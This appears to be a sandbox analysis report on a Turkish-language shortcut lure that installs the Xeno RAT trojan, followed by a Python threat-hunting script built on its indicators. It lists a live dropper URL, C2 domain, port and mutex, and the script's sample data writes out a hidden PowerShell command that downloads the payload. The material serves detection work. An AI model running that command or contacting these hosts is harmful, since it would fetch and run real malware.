General

  • Target

    Odeme -(Mayis).lnk.lnk

  • Size

    2KB

  • Sample

    240503-pqmymsed6v

  • MD5

    2ad899ef7b0d361186d8487950b7e167

  • SHA1

    151d04d656e68152cc2116b0837331a7df30eb27

  • SHA256

    2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618

  • SHA512

    2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • exe.dropper

    https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif

Extracted

  • Family

    xenorat

  • C2

    dns.requimacofradian.site

  • Mutex

    Xeno_rat_nd8818g

Attributes
  • delay

    60000

  • install_path

    appdata

  • port

    1243

  • startup_name

    uic

Targets

    • Target

      Odeme -(Mayis).lnk.lnk

    • Size

      2KB

    • MD5

      2ad899ef7b0d361186d8487950b7e167

    • SHA1

      151d04d656e68152cc2116b0837331a7df30eb27

    • SHA256

      2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618

    • SHA512

      2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b

    • XenoRat

      XenoRat (Xeno RAT) is a remote access trojan written in C#.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up the country code configured in the registry, most likely as a geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Suspicious use of SetThreadContext
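The extracted configuration and the behaviour signatures above together describe a short chain: a shortcut with a doubled extension (the lure name is Turkish for "Payment (May)") starts a hidden PowerShell that fetches a PE renamed to .pif, which installs under AppData, registers a startup entry named "uic", and connects to the C2 on port 1243 after a 60000 ms delay. The Python below is an added example, not part of the sandbox report and not Xeno RAT's own code: it turns those indicators into a hunt over host telemetry. The indicator values are copied from the config above; the event dictionaries, their field names and the PowerShell command line are constructed for the example, and treating startup_name as a Run-key value name is an assumption.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Indicator values copied from the extracted configuration on this page.
IOC = {
    "dropper_url": "https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/"
                   "uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif",
    "c2_host": "dns.requimacofradian.site",
    "c2_port": 1243,
    "mutex": "Xeno_rat_nd8818g",
    "startup_name": "uic",   # assumed to be used as a Run-key value name
    "delay_ms": 60000,       # sleep before first C2 contact
}
DROPPER_HOST = urlparse(IOC["dropper_url"]).hostname.lower()

# "-w hidden", "-WindowStyle Hidden" and the abbreviations in between.
HIDDEN_FLAG = re.compile(r"-w\w*\s+hidden", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
DOUBLE_EXT_LNK = re.compile(r"\.\w{2,4}\.lnk\b", re.IGNORECASE)
PE_EXTS = (".exe", ".pif", ".scr", ".com", ".dll")


def match_event(ev):
    """Return the indicator names a single telemetry event matches (possibly none)."""
    hits = []
    kind = ev.get("type")
    if kind == "process":
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "")
        # Shortcut with a doubled extension, as in 'Odeme -(Mayis).lnk.lnk'.
        if DOUBLE_EXT_LNK.search(cmd):
            hits.append("double_extension_lnk")
        if image.endswith("powershell.exe"):
            urls = URL_RE.findall(cmd)
            if HIDDEN_FLAG.search(cmd) and urls:
                hits.append("hidden_powershell_download")
            for url in urls:
                parsed = urlparse(url)
                # Known dropper host, or any PE (incl. renamed .pif) pulled by PowerShell.
                if (parsed.hostname or "").lower() == DROPPER_HOST \
                        or parsed.path.lower().endswith(PE_EXTS):
                    hits.append("dropper_url")
                    break
        # install_path = appdata: a PE executing out of a user's AppData tree.
        if "\\appdata\\" in image and image.endswith(PE_EXTS):
            hits.append("pe_run_from_appdata")
    elif kind == "dns" and ev.get("query", "").lower() == IOC["c2_host"]:
        hits.append("c2_dns")
    elif kind == "network" and ev.get("dest_port") == IOC["c2_port"] \
            and ev.get("dest_host", "").lower() == IOC["c2_host"]:
        hits.append("c2_connection")
    elif kind == "registry" and ev.get("key", "").lower().endswith("\\currentversion\\run") \
            and ev.get("value") == IOC["startup_name"]:
        hits.append("startup_run_key")
    elif kind == "mutex" and ev.get("name") == IOC["mutex"]:
        hits.append("xenorat_mutex")
    return hits


def hunt(events):
    """Count how often each indicator fires across a stream of events."""
    counts = Counter()
    for ev in events:
        counts.update(match_event(ev))
    return dict(counts)


# Constructed sample telemetry (Sysmon-like field names are assumed, not real logs).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\victim\Downloads\Odeme -(Mayis).lnk.lnk"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr ' + IOC["dropper_url"]
                + ' -OutFile $env:APPDATA\\cfhfcg.pif"'},
    {"type": "process", "image": r"C:\Users\victim\AppData\Roaming\cfhfcg.pif",
     "cmdline": "cfhfcg.pif"},
    {"type": "mutex", "name": "Xeno_rat_nd8818g"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "uic"},
    {"type": "dns", "query": "dns.requimacofradian.site"},
    {"type": "network", "dest_host": "dns.requimacofradian.site", "dest_port": 1243},
    {"type": "dns", "query": "update.microsoft.com"},   # benign noise, must not fire
]

if __name__ == "__main__":
    for name, n in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"{name}: {n}")
```

The host-independent checks (doubled .lnk extension, hidden PowerShell fetching a PE, a PE launched from AppData) are what survive when the actor rotates the domain and port, so keep them even after the atomic indicators expire. Note also the 60000 ms delay: a sandbox run shorter than about a minute may finish before the first C2 contact, so the absence of network traffic in a short detonation is not evidence that the sample is inert.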

MITRE ATT&CK Enterprise v15

Tasks